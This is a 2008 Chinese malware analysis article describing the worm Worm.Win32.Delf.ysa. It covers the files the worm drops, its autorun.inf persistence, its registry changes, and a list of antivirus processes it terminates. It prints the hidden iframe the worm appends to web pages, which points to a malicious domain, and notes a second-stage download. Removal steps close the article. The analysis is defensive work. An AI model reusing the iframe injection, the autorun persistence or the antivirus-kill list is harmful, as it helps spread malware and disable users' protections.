科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网安全频道Worm.Win32.Delf.ysa感染下载者

Worm.Win32.Delf.ysa感染下载者

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

File: yahoo5.exe,Size: 64512 bytes,病毒名:Trojan-psw.Win32.Magania.os 卡巴,文件变化:释放文件C:\WINDOWS\system32\Shell.exe,C:\WINDOWS\system32\Shell.pci,C:\pass.dic。

作者:zdnet安全频道 来源:论坛整理 2008年6月23日

关键字: 病毒 下载者

  • 评论
  • 分享微博
  • 分享邮件

File: yahoo5.exe
Size: 64512 bytes
MD5: 3868D64AADFAF86EA6DEBCE9F144645A
SHA1: F0E54DF8F41BAE7872D96B6E4D8361E6A2DA291D
CRC32: 8051F02D
病毒名:Trojan-psw.Win32.Magania.os 卡巴
Worm.Win32.Delf.ysa 瑞星

文件变化:
释放文件
C:\WINDOWS\system32\Shell.exe
C:\WINDOWS\system32\Shell.pci
C:\pass.dic

各分区根目录释放
shell.exe
autorun.inf

autorun.inf内容
[Autorun]
OPEN=Shell.exe
shellexecute=Shell.exe
shell\Auto\command=Shell.exe

修改注册表:
创建启动项目
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
        <Shell.exe><C:\WINDOWS\system32\Shell.exe>
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\

Advanced\Folder\Hidden\SHOWALL]
为0
破坏显示隐藏文件
其他行为

停止server服务
查找SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\密码防盗专家 综合版 注册表项
找到则将其删除

终止以下进程或关闭窗口
KVXP.KXP
KVMonXP.KXP
RavMon.exe
RavMonClass
TfLockDownMain
ZoneAlarm
ZAFrameWnd
VirusScan
Symantec AntiVirus
Duba
Wrapped gift Killer
IceSword
pjf(ustc)

EGHOST.EXE
PasswordGuard.exe
MAILMON.EXE
KAVPFW.EXE
IPARMOR.EXE
_AVP32.EXE..
_AVPCC.EXE
_AVPM.EXEAVP32.EXE
AVPCC.EXE
AVPM.EXE
AVP.EXE
NAVAPW32.EXE
NAVW32.EXE
nod32kui.exe
nod32kru.exe
PFW.exe
Kfw.exe
KAVPFW.exe
vsmon.exe
Mcshield.exe
VsTskMgr.exe
naPrdMgr.exe
UpdaterUI.exe
TBMon.exe
scan32.exe
Ravmond.exe
CCenter.exe
RavTask.exe
Rav.exe
Ravmon.exe
RavmonD.exe
RavStub.exe
KVXP.kxp
KvMonXP.kxp
KVCenter.kxp
KVSrvXP.exe
KRegEx.exe
UIHost.exe
TrojDie.kxp
360Safe.exe
360tray.kxp
FrogAgent.exe
FYFireWall.exe
Rundl132.exe
Logo_1.exe
Logo1_.exe

遍历非系统分区的.ASP .exe .com .pif .exe .ASPX .COM .HTM .HTML .JSP .PHP文件
感染.ASP
.ASPX
.COM
.HTM
.HTML
.JSP
.PHP
文件
在其后面加入 <iframe src=http://www.photoyahoo5.com                                           width=0 height=0></iframe>的代码

感染.exe .com .pif .exe
在其头部加入64516字节的内容 属于文件头寄生感染

连接网络下载http://www.photoyahoo5.com/tools/01.exe到C盘根目录下

清除方法:
1.安全模式下:

把下面的 代码拷入记事本中然后另存为1.reg文件
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\

Advanced\Folder\Hidden\SHOWALL]
"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
"Text"="@shell32.dll,-30500"
"Type"="radio"
"CheckedValue"=dword:00000001
"ValueName"="Hidden"
"DefaultValue"=dword:00000002
"HKeyRoot"=dword:80000001
"HelpID"="shell.hlp#51105"

双击1.reg把这个注册表项导入

双击我的电脑,工具,文件夹选项,查看,单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件(推荐)"前面的钩。在提示确定更改时,单击“是” 然后确定
然后删除C:\WINDOWS\system32\Shell.exe
C:\WINDOWS\system32\Shell.pci
C:\pass.dic

以及各个分区下面的shell.exe
autorun.inf

2.删除病毒启动项
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
<Shell.exe><C:\WINDOWS\system32\Shell.exe>

3.利用反病毒软件修复受感染的exe文件
4.修复被修改的网页文件

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章